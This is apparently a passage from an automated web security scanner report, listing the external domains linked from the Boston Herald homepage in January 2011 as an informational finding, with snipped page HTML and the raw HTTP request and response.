<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-logan-mankins-on-the-pats-i-dont-see-them-trying-to-keep-me/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/mankins-looking-up.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/"><img src="http://cache.heraldinteractive.com/blogs/news/lone_republican/wp-content/uploads/2011/01/deval-82709.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/07.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers’ LaMarcus Aldridge during last night’s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in ‘The Mechanic,’ a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1312514&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/8a420e_ltpSteamB012811.jpg" border="0"
width="207" height="181" caption="Ways to take the chill out of winter" /></a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312321&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/d0a387_Padma_01272011.jpg" border="0"
width="207" height="181" caption="Complicated custody battle for Padma Lakshmi" /></a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>
<a class="orange" href="http://www.homefind.com">Search Homes</a>  |  
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>  |  
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker’s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.272. http://www.bostonherald.com/index.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/index.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/index.bg?srvc=home&tab=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F&c5=&c6=&c15=
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg
http://cache.heraldinteractive.com/blogs/news/lone_republican/wp-content/uploads/2011/01/deval-82709.jpg
http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg
http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg
http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/mankins-looking-up.JPG
http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif
http://cache.heraldinteractive.com/images/siteImages/weather/02.gif
http://cache.heraldinteractive.com/images/siteImages/weather/03.gif
http://cache.heraldinteractive.com/images/siteImages/weather/07.gif
http://cache.heraldinteractive.com/images/siteImages/weather/19.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg
http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg
http://multimedia.heraldinteractive.com/images/20110126/ed4fba_tyler_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/5eb1a6_mitt_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG
http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/8df24f_Spidey_01292011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg
http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg
http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg
http://multimedia.heraldinteractive.com/images/promo/20110128/b6181f7db3_DieselTEASE.jpg
http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg
http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg
http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/individual.aspx?team=028
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=
http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.carfind.com/?srvc=home&position=also
http://www.carfind.com/sellCar.bg
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg
http://www.homefind.com/
http://www.homefind.com/?listingid=HF5728980
http://www.homefind.com/?srvc=home&position=also
http://www.homefind.com/for-agents/
http://www.homefind.com/post-property/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.massliteracy.org/
http://www.people2people.com/?connect=boshrld&page=login
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.shoplocal.com/bostonherald/
http://www.uclick.com/client/boh/sudoc/

Request

GET /index.bg?srvc=home&tab=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
